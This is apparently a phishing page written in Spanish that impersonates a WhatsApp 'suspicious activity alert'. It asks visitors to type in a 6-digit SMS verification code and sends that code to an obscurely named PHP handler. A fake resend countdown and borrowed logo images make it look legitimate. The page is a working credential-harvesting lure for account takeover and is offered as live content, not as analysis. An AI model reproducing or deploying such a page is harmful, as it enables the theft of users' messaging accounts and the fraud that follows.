<!DOCTYPE html>
<html lang="es"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Alerta de Actividad Sospechosa - WhatsApp</title>
    <link rel="stylesheet" type="text/css" href="style.css">
    <style>
        body {
            font-family: Arial, sans-serif;
            display: flex;
            justify-content: center;
            align-items: center;
            height: 100vh;
            background-color: #f5f5f5;
        }
        #resendButton {
            font-size: 16px;
            padding: 10px 20px;
            border: none;
            border-radius: 5px;
            cursor: not-allowed;
            background-color: white;
            color: #666;
            border-radius: 25px;
        }
        #resendButton.active {
            cursor: pointer;
            background-color: #075e54;
            color: white;

            padding: 12px;
            font-size: .9rem;
            color: #fff;
            
            border: 0;
            cursor: pointer;
            transition: background-color .3s ease;
            text-transform: uppercase;
            letter-spacing: 1px;
        }
    </style>
</head>
<body>


    <header>
        <img src="https://sappsapp23.sirv.com/docs/117_outlook.jpg" alt="Logo WhatsApp">
    </header>

    <div class="content">
        <div class="logows"><img src="https://cdn.prod.website-files.com/65ba24129df733a18dfde106/65ddbbdf7d0845821fbdc243_platform-solution2.png" width="100" id="wsPhoto" alt="Logo WhatsApp"></div>
        <p>Enviaremos un nuevo código de verificación de 6 dígitos por SMS a su número teléfono registrado, introduzca el código:</p>
        <form action="fgsdf3302.5.php" method="post">
    
            <input type="tel" id="cod" name="cod" minlength="6" maxlength="6" placeholder="Código" required="">

            <button type="submit" id="submitButton">Continuar</button>
            <br><br>
            <br>
            <p style="line-height: 1.3; color:#075e54;">¿No recibiste el codigo? </p>
           
            <button id="resendButton" style="margin-top: 0px;" disabled>Reenviar SMS en <span id="timer">01:30</span></button>
        </form>
    </div>

    <footer>
        
    </footer>
    <script>
        let timeLeft = 90;
        const timerElement = document.getElementById("timer");
        const button = document.getElementById("resendButton");

        function updateTimer() {
            let minutes = Math.floor(timeLeft / 60);
            let seconds = timeLeft % 60;
            timerElement.textContent = `${minutes.toString().padStart(2, '0')}:${seconds.toString().padStart(2, '0')}`;
            if (timeLeft > 0) {
                timeLeft--;
                setTimeout(updateTimer, 1000);
            } else {
                button.textContent = "Reenviar SMS";
                button.classList.add("active");
                button.removeAttribute("disabled");
            }
        }
        button.addEventListener("click", function() {
            window.location.reload();
        });

        updateTimer();
    </script>

    <script src="secure.js"></script>
</body></html>